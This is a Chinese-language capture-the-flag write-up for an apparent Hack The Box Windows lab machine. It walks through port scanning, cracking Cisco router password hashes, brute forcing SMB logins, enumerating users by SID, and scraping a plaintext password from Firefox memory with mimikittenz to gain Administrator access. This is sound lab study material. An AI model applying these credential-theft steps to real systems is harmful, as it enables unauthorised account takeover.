基本信息

端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
$ nmap -sC -sV -Pn 10.10.10.149
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-23 14:52 CST
Nmap scan report for 10.10.10.149
Host is up (0.070s latency).
Not shown: 997 filtered ports
PORT    STATE SERVICE       VERSION
80/tcp  open  http          Microsoft IIS httpd 10.0
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
| http-title: Support Login Page
|_Requested resource was login.php
135/tcp open  msrpc         Microsoft Windows RPC
445/tcp open  microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2021-04-23T06:53:37
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 108.08 seconds

80

一个登录页面:

guest

80有guest访问,附件给出config,是cisco路由器:

config.txt

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
version 12.2
no service pad
service password-encryption
!
isdn switch-type basic-5ess
!
hostname ios-1
!
security passwords min-length 12
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
!
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
!
!
ip ssh authentication-retries 5
ip ssh version 2
!
!
router bgp 100
 synchronization
 bgp log-neighbor-changes
 bgp dampening
 network 192.168.0.0Â mask 300.255.255.0
 timers bgp 3 9
 redistribute connected
!
ip classless
ip route 0.0.0.0 0.0.0.0 192.168.0.1
!
!
access-list 101 permit ip any any
dialer-list 1 protocol ip list 101
!
no ip http server
no ip http secure-server
!
line vty 0 4
 session-timeout 600
 authorization exec SSH
 transport input ssh

hash crack

5型用John,7型可以直接在线:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
0242114B0E143F015F5D1E161713 : $uperP@ssword
02375012182C1A1D751618034F36415408 : Q4)sJu\Y8qz*A3?d

stealth1agent

➜  Desktop sudo john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
[sudo] password for miao:
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
stealth1agent    (?)
1g 0:00:00:20 DONE (2021-04-19 11:07) 0.04921g/s 172507p/s 172507c/s 172507C/s stealthy001..steak7893
Use the "--show" option to display all of the cracked passwords reliably
Session completed

smb

现在我们有四个用户名(hazard是guest访问里得到的)和三个密码,可以组合来爆破smb:

share

smb里没什么东西,当前用户密码也不能winrm登录:

rpc

可以通过rpc获取用户名:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
➜  Desktop rpcclient -U 'hazard%stealth1agent' 10.10.10.149
rpcclient $> lookupnames hazard
hazard S-1-5-21-4254423774-1266059056-3197185112-1008 (User: 1)
rpcclient $> lookupsids S-1-5-21-4254423774-1266059056-3197185112-1008
S-1-5-21-4254423774-1266059056-3197185112-1008 SUPPORTDESK\Hazard (1)
rpcclient $> ^C
➜  Desktop impacket-lookupsid hazard:stealth1agent@10.10.10.149
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Brute forcing SIDs at 10.10.10.149
[*] StringBinding ncacn_np:10.10.10.149[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-4254423774-1266059056-3197185112
500: SUPPORTDESK\Administrator (SidTypeUser)
501: SUPPORTDESK\Guest (SidTypeUser)
503: SUPPORTDESK\DefaultAccount (SidTypeUser)
504: SUPPORTDESK\WDAGUtilityAccount (SidTypeUser)
513: SUPPORTDESK\None (SidTypeGroup)
1008: SUPPORTDESK\Hazard (SidTypeUser)
1009: SUPPORTDESK\support (SidTypeUser)
1012: SUPPORTDESK\Chase (SidTypeUser)
1013: SUPPORTDESK\Jason (SidTypeUser)

brute

得到的用户名加入字典再次爆破,得到:

user flag

这组账号密码可以winrm登录,桌面得到user.txt:

提权信息

根据todo.txt,Stuff会检查issue,issue就是前面我们看到的guest页面里的东西,那他是通过什么检查呢,可以猜到浏览器,而根据login我们可以看到登录密码是明文的,所以大概就是dump firefox的内存获取密码

1
2
3
4
5
6
Stuff to-do:
1. Keep checking the issues list.
2. Fix the router config.

Done:
1. Restricted access for guest user.

memory dump

可以传个procdump上去dump firefox的内存下载下来查找,也可以用mimikittenz直接在内存里搜索:

修改脚本里的正则,然后加载上去运行,得到密码

1
[mimikittenz.MemProcInspector]::AddRegex("Heist","login_username=.{1,20}@.{1,20}&login_password=.{1,50}&login=")
1
Heist       login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=

root flag

得到的就是Administrator密码,登录上去桌面得到root.txt:

参考资料